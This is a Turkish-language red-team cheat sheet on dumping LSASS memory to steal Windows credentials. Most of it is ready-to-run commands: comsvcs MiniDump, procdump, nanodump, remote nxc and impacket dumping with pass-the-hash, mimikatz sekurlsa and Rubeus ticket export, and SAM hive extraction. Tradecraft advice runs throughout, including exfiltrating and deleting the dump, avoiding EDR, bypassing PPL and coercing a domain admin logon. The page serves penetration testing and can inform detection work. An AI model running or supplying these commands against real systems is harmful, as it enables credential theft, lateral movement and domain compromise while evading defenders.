Skip to content

LSASS Credential Dumping

ATT&CK T1003.001 difficulty: orta

LSASS (lsass.exe) süreci; oturum açmış kullanıcıların parolalarını (WDigest / SSP’ye bağlı), NT hash’lerini, Kerberos biletlerini ve DPAPI anahtarlarını bellekte tutar. Yerel yönetici / SYSTEM / SeDebugPrivilege ile bu belleği dökmek, yanal harekette anahtar adımdır. Özellikle HasSession → AdminTo BloodHound yollarında “oturumu olan DA’yı yakala” senaryosudur.

  • Hedefte yüksek yetki: local admin + SeDebug, veya SYSTEM.
  • Mümkünse PPL (RunAsPPL) kapalı / bypass edilebilir.
  • Credential Guard açıksa bellekten klasik secret çıkarma kısıtlanır — alternatif: ticket, SAM, DCSync, DPAPI.

BloodHound: HasSession, AdminTo, CanRDP, CanPSRemote.

Terminal window
tasklist /fi "imagename eq lsass.exe"
Terminal window
Get-Process lsass
Terminal window
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\Temp\l.dmp full
Terminal window
procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\l.dmp
Terminal window
nanodump.x64.exe --write C:\Windows\Temp\l.dmp
Terminal window
nanodump.x64.exe --fork --write l.dmp
Terminal window
createdump.exe -u -f l.dmp <PID>
Terminal window
powershell -c "rundll32 ... MiniDump ..."
Terminal window
nxc smb 10.10.10.20 -u admin -H :NTHASH -M lsassy
Terminal window
nxc smb 10.10.10.20 -u admin -H :NTHASH -M nanodump
Terminal window
nxc smb 10.10.10.20 -u admin -H :NTHASH -M procdump
Terminal window
nxc smb 10.10.10.20 -u admin -H :NTHASH -M mimikatz
Terminal window
impacket-wmiexec -hashes :NTHASH domain.local/admin@10.10.10.20 \
'rundll32 C:\Windows\System32\comsvcs.dll, MiniDump PID C:\Windows\Temp\l.dmp full'
  1. Offline analiz (tercih — EDR’den uzak) :

    Terminal window
    pypykatz lsa minidump l.dmp
    Terminal window
    pypykatz lsa minidump l.dmp -o json
  2. Canlı mimikatz / benzeri (host üzerinde SYSTEM):

    privilege::debug
    token::elevate
    sekurlsa::logonpasswords
    sekurlsa::ekeys
    sekurlsa::tickets /export
    sekurlsa::dpapi
    Terminal window
    Rubeus.exe dump /nowrap
    Terminal window
    Rubeus.exe triage
  3. Malzemeyi kullan : NT hash → Pass-the-Hash

  4. .kirbi → Pass-the-Ticket

  5. cleartext → spray / RDP / yeniden kullanım

  6. DPAPI masterkey → DPAPI

PPL / Credential Guard notları (saldırgan bakışı)

Section titled “PPL / Credential Guard notları (saldırgan bakışı)”
RunAsPPL açık → klasik MiniDump ACCESS DENIED
→ PPL bypass (mimikatz ! process / özel sürücü — yüksek risk, lab)
→ Handle duplication / SSP injection teknikleri (araç bağımlı)
→ LSASS'a dokunmadan: SAM (reg save), LSA secrets, DCSync, tickets from Rubeus
Credential Guard → NTLM/cred izolasyonu; Kerberos ticket çalma hâlâ mümkün olabilir
# SAM + SYSTEM (local admin, LSASS'siz)
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# offline:
impacket-secretsdump -sam sam.save -system system.save LOCAL

LSASS · pypykatz

embedded tool
Generated command
pypykatz lsa minidump lsass.dmp
BloodHound: HasSession(DA) on WS01 + AdminTo(you→WS01)
→ dump LSASS on WS01
→ DA NTLM / TGT
→ DCSync / Golden
  • Dump’u hemen exfil et ve host’tan sil ; disk artefaktı ( .dmp ) ağır IOC.
  • lsassy / nanodump gibi ağ araçları tercih; mimikatz binary drop etme.
  • comsvcs MiniDump Event / Sysmon Process Access (10) üretir — beklenen gürültü.
  • Aynı host’ta tekrar tekrar dump = gereksiz; bir kez al, offline parse et.
  • WDigest açık değilse cleartext gelmeyebilir; NT + tickets yeter.
  • Admin ama SeDebug yok (Restricted Admin / bazı AV) → elevate SYSTEM ( psexec -s , impersonate ).
  • 32-bit araçla 64-bit LSASS.
  • Dump path yazılamıyor (permission); C:\Windows\Temp dene.
  • Sadece machine account hash çıkması — interaktif oturum yok; DA’nın oturum açmasını bekle veya coerce et.
  • Parse’i Windows’ta yapmak yerine pypykatz ile Linux’ta yap.

Pass-the-Hash · Pass-the-Ticket · DPAPI · DCSync